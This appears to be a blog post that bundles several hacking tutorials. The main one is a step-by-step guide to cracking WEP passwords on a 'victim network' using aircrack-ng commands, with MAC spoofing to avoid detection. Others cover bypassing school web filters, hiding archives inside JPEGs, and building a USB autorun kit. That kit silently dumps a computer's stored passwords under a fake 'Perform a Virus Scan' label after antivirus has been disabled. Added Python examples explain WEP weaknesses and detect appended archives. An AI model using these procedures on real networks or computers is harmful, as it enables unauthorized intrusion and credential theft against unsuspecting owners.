Thursday, 25 August 2016

Hacking WEP wifi passwords

1. Getting the right tools
Download BackTrack 3. It can be found here:
http://www.remote-exploit.org/backtrack_download.html

The BackTrack 4 beta is out, but until it has been fully tested (especially if you are new to this) I would get the BT3 setup. The rest of this guide assumes you downloaded BT3. I downloaded the CD ISO and burned it to a CD. Insert your BT3 CD or USB drive and reboot your computer into BT3. I always load the 3rd boot option from the boot menu (VESA/KDE). You only have a few seconds before it auto-boots into the 1st option, so be ready. The 1st option boots too slowly or not at all, so always boot from the 2nd or 3rd. Experiment to see what works best for you. (BT3 dates from 2008 and that download link is long gone; the aircrack-ng suite it shipped is still maintained and comes with Kali Linux, BackTrack's successor. Only the interface names differ: current drivers call the card wlan0 and airmon-ng start creates a monitor interface named wlan0mon, where BT3's madwifi driver used wifi0 and ath0 as described below.)

2. Preparing the victim network for attack
Once in BT3, click the tiny black box in the lower left corner to load up a "Konsole" window. Now we must prep your wireless card. Type:
airmon-ng
You will see the name of your wireless card (mine is named "ath0"). From here on out, replace "ath0" with the name of your card. Now type:
airmon-ng stop ath0
then type:
ifconfig wifi0 down
then:
macchanger --mac 00:11:22:33:44:55 wifi0
then:
airmon-ng start wifi0
(With BT3's madwifi driver, wifi0 is the physical radio and ath0 is the virtual interface airmon-ng creates on top of it; that is why the MAC is changed on wifi0 while the capture runs on ath0. The stop/down/start sequence is needed because the MAC of an interface cannot be changed while it is up.) What these steps did was spoof (fake) your MAC address so that, just in case your computer is discovered by someone while you are breaking in, they will not see your real MAC address. Remember the address you chose: aireplay-ng will need exactly the same value later, because the access point only accepts injected frames from a MAC it has seen associate. Moving on... Now it's time to discover some networks to break into.
Type:
airodump-ng ath0
Now you will see a list of wireless networks start to populate. Some will have a better signal than others and it is a good idea to pick one that has a decent signal otherwise it will take forever to crack or you may not be able to crack it at all. Once you see the network that you want to crack, do this:
hold down ctrl and tap c
This will stop airodump from populating networks and will freeze the screen so that you can see the info that you need.
**Now from here on out, when I tell you to type a command, you need to replace whatever is in parentheses with the value from your screen. For example, if I say to type -c (channel), don't actually type -c (channel); replace it with the channel number, so you would type, for example, -c 6. Can't be much clearer than that... let's continue...
Now find the network that you want to crack and MAKE SURE that the ENC column for that network says WEP. If it says WPA or any variation of WPA, move on. WPA can also be attacked with BackTrack and other tools, but it is a whole other ball game (a dictionary attack on a captured handshake rather than a statistical attack on the cipher), and you need to master WEP first.
Once you've decided on a network, take note of its channel number and BSSID. The BSSID is the access point's MAC address and will look something like 00:14:6C:7E:40:80 (hex digits only). The channel number will be under a heading that says "CH". Now, in the same Konsole window, type:
airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0
The FILE NAME can be whatever you want. This is simply the prefix airodump uses for the files in which it stores the packets you receive, to crack later. Don't put in an extension; just pick a word you will remember. I usually make mine "wepkey" because I can always remember it. airodump adds -01 and the extension itself, so you end up with wepkey-01.cap (the packets) alongside wepkey-01.csv and similar text summaries. Locking the capture to one channel with -c matters: airodump stops hopping between channels, so it no longer misses frames from the target.

**Side Note: if you crack more than one network in the same session, use a different file name for each one. If you reuse a name, airodump does not overwrite the old capture; it moves on to -02, -03 and so on, and your aircrack command then has to point at the right file. I usually just name them wepkey1, wepkey2, etc.**
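As an added example (my own code, not part of the original post or of the aircrack-ng suite), a small Python script that reads the CSV airodump-ng writes next to the .cap file and lists the WEP networks with their signal and IV counts, so you can pick a target from the file instead of freezing the screen with Ctrl-C. The column header is the one airodump-ng 1.x writes; the three network rows and the station row are constructed sample data, and the packet estimates are the rule-of-thumb PTW figures from the aircrack-ng documentation.

```python
import csv
import io

# Constructed sample in the layout of an airodump-ng "<prefix>-01.csv" file (header as written by
# airodump-ng 1.x; the rows are made up). The station table follows the access-point table after a blank line.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:14:6C:7E:40:80, 2016-08-25 10:01:02, 2016-08-25 10:12:40,  6,  54, WEP , WEP, OPN, -41,  512,  31240,   0.  0.  0.  0,   6, labwep,
00:0F:B5:88:AC:82, 2016-08-25 10:01:05, 2016-08-25 10:12:39, 11,  54, WPA2, CCMP, PSK, -55,  480,   1200,   0.  0.  0.  0,   8, homewpa2,
00:1D:7E:11:22:33, 2016-08-25 10:02:10, 2016-08-25 10:12:30,  1,  11, WEP , WEP, SKA, -88,   90,     40,   0.  0.  0.  0,   5, oldap,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:55, 2016-08-25 10:05:00, 2016-08-25 10:12:40, -30, 2100, 00:14:6C:7E:40:80,
"""

# Rough number of data frames (unique IVs) the PTW attack in aircrack-ng wants, per the aircrack-ng docs.
PTW_PACKETS = {64: 20_000, 128: 40_000}


def parse_access_points(text):
    """Return one dict per access-point row, keyed by the (stripped) header names."""
    ap_table = text.replace("\r\n", "\n").strip().split("\n\n")[0]
    rows = list(csv.reader(io.StringIO(ap_table), skipinitialspace=True))
    header = [h.strip() for h in rows[0]]
    return [{h: v.strip() for h, v in zip(header, row)} for row in rows[1:] if len(row) >= len(header)]


def wep_targets(text, min_power=-70):
    """WEP networks sorted strongest first, with the fields the rest of the guide asks you to note down."""
    targets = []
    for ap in parse_access_points(text):
        if ap["Privacy"] != "WEP":
            continue                      # WPA/WPA2 is a different attack entirely
        power = int(ap["Power"])
        targets.append({
            "bssid": ap["BSSID"],
            "essid": ap["ESSID"],
            "channel": int(ap["channel"]),
            "auth": ap["Authentication"],  # OPN, or SKA (shared key, needs extra steps)
            "power": power,
            "ivs": int(ap["# IV"]),
            "usable_signal": power >= min_power,
        })
    targets.sort(key=lambda t: t["power"], reverse=True)
    return targets


def capture_progress(ivs, key_bits=128):
    """Fraction of the rule-of-thumb packet count collected so far (may exceed 1.0)."""
    return ivs / PTW_PACKETS[key_bits]


if __name__ == "__main__":
    for t in wep_targets(SAMPLE_CSV):
        print(f"{t['bssid']}  ch {t['channel']:>2}  {t['auth']}  {t['power']} dBm  "
              f"{t['ivs']} IVs ({capture_progress(t['ivs']):.0%} of the 128-bit estimate)  {t['essid']}")
```

Run it against your own capture with `wep_targets(open("wepkey-01.csv").read())`; a network flagged SKA or below the signal threshold is one to skip, for the reasons given later in this guide.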

Once you have typed in that last command, the airodump screen changes and shows your computer gathering packets. Watch the column airodump labels "#Data" (older builds, including the one I used, show it as "IV"). IV stands for "Initialization Vector": each WEP data frame carries a 3-byte IV in the clear, and the frame is encrypted with RC4 keyed by that IV glued onto the secret key. In plain terms, every data packet is a clue to the key, and what counts is how many packets with different IVs you have collected. Once you have a minimum of 5,000 of these IVs you can try to crack the key.
I've cracked some right at 5,000 and others have taken over 60,000. It does not depend on how long or clever the owner made the password: WEP's weakness is statistical, so a random key falls just as fast as a dictionary word. What matters is the key length (64-bit keys need far fewer IVs than 128-bit keys) and luck in which IVs you happened to capture. As a rule of thumb for the PTW attack aircrack-ng uses, expect around 20,000 data packets for a 64-bit key and 40,000 to 85,000 for a 128-bit key.
Now you are thinking, "I'm screwed because my IVs are going up really slowly." Well, don't worry; now we are going to trick the router into giving us HUNDREDS of IVs per second.
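Added example (my own code, not from the post or from the aircrack-ng project) showing what an IV is and why collecting many of them matters. It implements RC4 and the WEP frame encryption (3-byte IV in the clear, RC4 keyed with IV||secret over payload + CRC-32 ICV) in Python and then shows two facts the statistical attacks build on: two frames with the same IV leak the XOR of their plaintexts, and the predictable LLC/SNAP header at the start of every data frame hands over the first keystream bytes for that IV for free. The key and frame contents are constructed; the FMS/PTW statistics that aircrack-ng applies on top of these facts are not implemented.

```python
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4: key-scheduling (KSA) followed by the output generator (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(secret: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP frame body: IV (3 bytes, in the clear) || RC4_{IV||secret}(payload || CRC-32 ICV)."""
    if len(iv) != 3 or len(secret) not in (5, 13):        # 64-bit or 128-bit WEP
        raise ValueError("IV must be 3 bytes, secret 5 or 13 bytes")
    icv = struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)
    keystream = rc4_keystream(iv + secret, len(payload) + 4)
    return iv + xor(payload + icv, keystream)


def wep_decrypt(secret: bytes, frame: bytes) -> bytes:
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4_keystream(iv + secret, len(body)))
    payload, icv = plain[:-4], plain[-4:]
    if struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF) != icv:
        raise ValueError("ICV mismatch: wrong key or corrupted frame")
    return payload


# Every WEP data frame starts with an LLC/SNAP header; 0x0806 marks ARP (0x0800 would be IP).
SNAP_ARP = bytes.fromhex("aaaa030000000806")


def iv_reuse_leak(secret: bytes, iv: bytes, p1: bytes, p2: bytes) -> bytes:
    """Same IV twice means the same keystream twice: C1 xor C2 == P1 xor P2, no key needed."""
    c1 = wep_encrypt(secret, iv, p1)[3:]
    c2 = wep_encrypt(secret, iv, p2)[3:]
    return xor(c1, c2)[: min(len(p1), len(p2))]


def keystream_from_known_header(frame: bytes) -> bytes:
    """Known plaintext: the SNAP header xor the first 8 ciphertext bytes is the keystream for this IV."""
    return xor(frame[3:11], SNAP_ARP)


if __name__ == "__main__":
    secret = b"\x01\x02\x03\x04\x05"                    # constructed 64-bit key
    iv = b"\x00\x00\x01"
    arp1 = SNAP_ARP + bytes.fromhex("0001080006040001") + b"A" * 20   # constructed ARP request bodies
    arp2 = SNAP_ARP + bytes.fromhex("0001080006040002") + b"B" * 20
    frame = wep_encrypt(secret, iv, arp1)
    print("round trip ok:", wep_decrypt(secret, frame) == arp1)
    print("IV reuse leaks P1^P2:", iv_reuse_leak(secret, iv, arp1, arp2) == xor(arp1, arp2))
    print("8 keystream bytes recovered:", keystream_from_known_header(frame) == rc4_keystream(iv + secret, 8))
```

With only 2^24 possible IVs a busy network repeats them within hours, and because the IV is the first three bytes of the RC4 key, every captured frame is a sample of RC4 run with a partly known key; that is the correlation aircrack-ng exploits, and why the counter in the airodump window is the number that matters.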

3. Actually cracking the WEP password
Now leave this Konsole window up and running and open a 2nd Konsole window. In this one type:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0
This is a fake authentication (-1; the 0 is the re-association delay, meaning authenticate once rather than keep re-authenticating). It makes the access point accept your spoofed MAC as an associated client, so the -h address must be exactly the one you set with macchanger. You should see "Association successful :-)". On its own this step produces no IVs; what actually makes the counter move is the ARP request replay attack, so once the association has succeeded, run in the same window:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0
This will print a line where your computer is reading packets and counting ARP requests and ACKs. Don't worry about what these mean; just know that these are your meal tickets. Now you just sit and wait. An ARP request is a short frame whose contents are predictable, so aireplay can recognise one without decrypting it. Once it finally captures one, it sends that same encrypted frame back to the router over and over, and the router answers every copy with a freshly encrypted reply, which means a new IV each time, hundreds per second. Sometimes this starts within seconds; sometimes you have to wait up to a few minutes, because someone on the network has to send an ARP request first. Just be patient. When it finally does happen, switch back to your first Konsole window and you should see the number under the data/IV column rising rapidly. This is great! It means you are almost finished. When this number reaches AT LEAST 5,000 you can start your crack. It will probably take more than this, but I always start cracking at 5,000 in case it is a 64-bit key that falls early.
Now you need to open up a 3rd and final Konsole window. This is where we actually crack the key. Type:
aircrack-ng -b (bssid) (filename)-01.cap
Remember the file name you made up earlier? Mine was "wepkey". Don't put a space between it and -01.cap; type it as you see it, so for me it would be wepkey-01.cap. aircrack will fire up and begin to crack the key. Typically you have to wait for more like 10,000 to 20,000 IVs before it succeeds. If it does not have enough yet, aircrack tests what you have so far and then prints something like "Failed. Next try with 10000 IVs." DON'T DO ANYTHING! It stays running; it is just letting you know that it is paused until more IVs are gathered, and it keeps re-reading the capture file that the first window is still writing. Once you pass the 10,000 mark it automatically tries again. If that fails it says "Failed. Next try with 15000 IVs." and so on until it finally gets it.
If you do everything correctly up to this point, before too long you will have the key! Now, if the key looks goofy, don't worry, it will still work. aircrack always prints the key as hex bytes separated by colons: a 64-bit (40-bit) key is 5 bytes, for example 1F:1A:1B:1C:1D, and a 128-bit (104-bit) key is 13 bytes. If every byte is a printable character, meaning the owner typed the key as text, aircrack also shows that text after the hex, something like KEY FOUND! [ 68:65:6C:6C:6F ] (ASCII: hello ). Either form connects you: enter the hex digits without the colons, or the ASCII text if aircrack printed one. Boot back into whatever operating system you normally use, connect to the network, type in the key, and presto! You are in!
It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.
I am not responsible for what you do with this information. Any malicious/illegal activity that you do, falls completely on you because...technically...this is just for you to test the security of your own network. :-)
I will gladly answer any legitimate questions anyone has to the best of my ability. HOWEVER, I WILL NOT ANSWER ANYONE THAT IS TOO LAZY TO READ THE WHOLE TUT AND JUST ASKS ME SOME QUESTION THAT I CLEARLY ANSWERED. No one wants to hold your hand through this...read the tut and go experiment until you get it right.
There are rare occasions where someone will use WEP with SKA (Shared Key Authentication) as well; airodump shows this as SKA instead of OPN in the AUTH column. If this is the case, the access point only talks to clients that answer an encrypted challenge, so the fake authentication in step 3 fails and the steps I laid out here will not work as they are. The extra work is to capture a legitimate client's challenge-response, which gives you the keystream needed to answer the challenge yourself (aireplay-ng's fake authentication accepts such a keystream file with its -y option). I've only seen this once or twice, though, so you probably won't run into it. If I get motivated, I may write up how to crack this in the future.

How to bypass your school or college blocking sites

First of all you need to go to:
http://g.ho.st/
This was a web desktop: a virtual computer that runs on someone else's server and that you drive from your browser, so the only thing the school's filter ever sees is a connection to g.ho.st. Pages you open inside its browser are fetched by the remote machine, and the blocklist is never consulted for them. (G.ho.st shut down in 2010, so these exact steps no longer work; the same idea survives in any hosted remote desktop or web proxy, and a filter that categorises the proxy site itself, or that runs on the endpoint, will still catch it.) At my school, our security is pretty high because of people like me and you.

OK, now you click on the big button that says: Start.

Now make an account; you should see the register button. I have made an account (trust me, it is easy).

After you have logged in, you should see another screen.

Once logged in, you should try to get onto the g.ho.st internet (alpha). To get onto the internet, follow these steps:

On the desktop, click the icon that says: Find cool web stuff. Then click the icon that says: Web. Now go to: Ghost services. There should be an icon that says: G.ho.st browser (alpha).

(If you go to a website and it says "open in a new tab because this site will function better", or something like that, don't do it: the page would then load in your own browser, outside the hosted desktop, where the school's filter applies again. But if you want to, just do it.)

How to hide files in a jpg

Set up:
1. You need a .zip or .rar compressor.

Steps:
1. Save the picture of your choice to your desktop.

2. Make a new .rar or .zip archive on your desktop.

3. Add the files you want to hide to the .zip or .rar archive.

4. Click Start, Run, and type cmd.

5. In the Command Prompt type cd desktop (the prompt opens in your user profile folder, which contains Desktop).

6. Now type copy /b picturename.jpg + archivename.rar outputfilename.jpg (if you used .zip: copy /b picturename.jpg + archivename.zip outputfilename.jpg). The /b switch matters: it copies the bytes as they are, whereas copy's default text mode for joining files stops at the first end-of-file character and corrupts the archive.

7. There should now be a file with the output name and a .jpg extension on the desktop. (Do not close the Command Prompt just yet.)

8. Double-click it to open the picture and check it out.

9. When you are done looking and want to get at the hidden files, type: ren outputfilename.jpg outputfilename.rar (or .zip)
Now you're done!
A quick info-fact: this works because image viewers stop reading at the JPEG end-of-image marker and ignore whatever follows, while zip tools find their central directory by looking at the end of the file and rar tools search for the archive signature. You can send the file to anyone and they just have to rename the extension to .zip or .rar. Keep in mind what it does not do: the file is visibly larger than the picture, a hex editor or any scanner that looks past the end-of-image marker finds the archive immediately (mail gateways and antivirus engines do exactly this), and the hidden files are not encrypted unless you password-protected the archive.
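Added example (my own code, not from the post): the check a scanner runs against this trick, in Python. It walks the JPEG marker structure to find where the image really ends, reports whatever is glued on after the EOI marker, and lists the members of an appended zip. Walking the segments rather than searching for the first FF D9 matters, because an EXIF thumbnail embedded in an APP1 segment carries its own EOI. The sample file is constructed: a JPEG skeleton with a valid marker layout but no real picture, plus a zip built in memory, joined exactly as copy /b would join them.

```python
import io
import struct
import zipfile

EOI, SOS = 0xD9, 0xDA
NO_LENGTH = {0xD8, 0x01} | set(range(0xD0, 0xD8))   # SOI, TEM and RST0..7 carry no length field


def jpeg_end_offset(data: bytes) -> int:
    """Walk the marker segments and return the offset just past the EOI marker.
    Segment lengths are honoured, so an EOI inside an embedded thumbnail is not mistaken for the end."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:                    # fill byte before a marker
            pos += 1
            continue
        pos += 2
        if marker == EOI:
            return pos
        if marker in NO_LENGTH:
            continue
        (seglen,) = struct.unpack(">H", data[pos:pos + 2])
        pos += seglen                         # the length field counts itself
        if marker == SOS:
            # entropy-coded data: a 0xFF byte is stuffed as FF 00, and FF D0..D7 are restart markers
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError("no EOI found")


SIGNATURES = {b"PK\x03\x04": "zip", b"Rar!\x1a\x07": "rar"}


def find_appended_archive(data: bytes):
    """(kind, offset, size) of whatever follows the JPEG, or None when the file ends at EOI."""
    end = jpeg_end_offset(data)
    trailer = data[end:]
    if not trailer:
        return None
    kind = next((name for sig, name in SIGNATURES.items() if trailer.startswith(sig)), "unknown")
    return kind, end, len(trailer)


def list_hidden_zip(data: bytes):
    """zipfile locates the central directory from the end of the file, so the JPEG prefix does no harm."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def _jpeg_skeleton() -> bytes:
    """Constructed JPEG with a valid marker structure but no real image data."""
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    thumb = b"\xff\xd8\xff\xd9"                                    # an embedded thumbnail has its own EOI
    app1 = b"\xff\xe1" + struct.pack(">H", 2 + 6 + len(thumb)) + b"Exif\x00\x00" + thumb
    sos = b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\xff\x00\x34\xff\xd0\x56"                         # a stuffed FF and an RST0 marker
    return b"\xff\xd8" + app0 + app1 + sos + scan + b"\xff\xd9"


def _zip_with(name: str, content: bytes) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, content)
    return buf.getvalue()


JPEG_ONLY = _jpeg_skeleton()
POLYGLOT = JPEG_ONLY + _zip_with("secret.txt", b"hidden payload\n")   # the bytes `copy /b` would produce

if __name__ == "__main__":
    print("naive first FF D9 at", POLYGLOT.find(b"\xff\xd9"), "(inside the thumbnail)")
    print("real JPEG ends at", jpeg_end_offset(POLYGLOT))
    print("trailer:", find_appended_archive(POLYGLOT))
    print("hidden members:", list_hidden_zip(POLYGLOT))
```

Point it at a real file with `find_appended_archive(open("outputfilename.jpg", "rb").read())`; a result of None means the picture ends where it should.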

How To Rename Your Recycle Bin

1. Click Start / Run.

2. Type regedit and press enter.

3. Open the HKEY_CLASSES_ROOT folder.

4. Open the CLSID folder.

5. Open the {645FF040-5081-101B-9F08-00AA002F954E} folder.

6. Open the ShellFolder folder

7. Change the "Attributes" data value from "40 01 00 20" to "50 01 00 20". Once completed, change the "CallForAttributes" DWORD value to 0x00000000 (double-click it and set the value data to 0). You must change both of these values for the rename option to appear.
After performing the above steps you will be able to rename the icon like any other icon: right-click the Recycle Bin icon on the desktop, click Rename, and rename it to whatever you wish. (This is a Windows XP tweak; Windows Vista and later offer Rename on the Recycle Bin without any registry change. {645FF040-5081-101B-9F08-00AA002F954E} is the Recycle Bin's class ID, and the bit you are setting in the first byte, 0x10, is the shell attribute SFGAO_CANRENAME, so export the key before editing it in case you want the original back.)

How to hack passwords using USB Drive

Today I will show you how to collect stored passwords using a USB pen drive. Windows and the programs on it store many of the passwords used day to day: instant messenger passwords (MSN, Yahoo, AOL, Windows Messenger and so on), the account passwords of Outlook Express and other mail clients (SMTP, POP, FTP), and the auto-complete passwords of browsers such as IE and Firefox. They are not stored in plain text, but encrypted with keys tied to the logged-on user's profile or credentials (Windows' Protected Storage and DPAPI, Firefox's own key database), which is exactly why a tool run inside that user's session can read them back. Many tools exist for recovering these passwords from their storage locations; with them and a USB pen drive you can build a toolkit (not a rootkit: it hides nothing and installs nothing, it just runs five programs and writes text files) that dumps the stored passwords of whatever computer it is plugged into. We need the following tools:

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free. Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE PassView: IE PassView is a small utility that reveals the passwords stored by the Internet Explorer browser. It supports Internet Explorer 7.0 as well as older versions, v4.0 - v6.0.

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of password-protected sites, MSN Explorer passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by the Mozilla Firefox web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to view the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
Here is a step by step procedure to create the password dumping toolkit:
NOTE: Your antivirus will flag these NirSoft tools as hacktools or "potentially unwanted" programs and quarantine them, so you must temporarily disable it while copying them (the same detections are what make such a stick noisy on any monitored machine).

1. Download all 5 tools, extract them and copy only the executables (.exe files) to your USB pen drive,
i.e. copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe to your USB drive.

2. Create a new Notepad file and write the following text into it:
[autorun]
open=launch.bat
action=Perform a Virus Scan
Save the Notepad file and rename it from New Text Document.txt to autorun.inf. Now copy the autorun.inf file onto your USB pen drive.

3. Create another Notepad file and write the following lines into it:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
Save the Notepad file and rename it from New Text Document.txt to launch.bat. Copy launch.bat to your USB drive as well. (/stext is the NirSoft switch that writes the results to a text file instead of opening a window; the files are written relative to the working directory, normally the root of the drive, next to the batch file.)

Now your toolkit is ready. You can use this pen drive on your own PC or on any machine you are authorised to test. Just follow these steps...

1. Insert the pen drive. Because we created an autorun.inf, the AutoPlay window pops up.

2. In the pop-up window, select the first option (Perform a Virus Scan). That label is the only social engineering involved: it is our action= text, not a Windows option, and choosing it runs launch.bat.

3. All the password tools now execute in the background (this takes only a few seconds). The passwords are written to the .TXT files next to them.

4. Remove the pen drive; the stored passwords are in the .TXT files.

This worked on Windows 2000 and XP as originally shipped, and on Vista. It does not work on Windows 7: there autorun.inf is honoured only for optical media, and Microsoft's 2011 update (KB971029) brought XP and Vista into line with that, so on a patched machine inserting the stick produces nothing beyond the ordinary AutoPlay prompt. The tools themselves still run if someone double-clicks launch.bat, and the /stext switch behaves the same way.

NOTE: This procedure will only recover the stored passwords (if any) on the computer, and only those of the user whose session is running.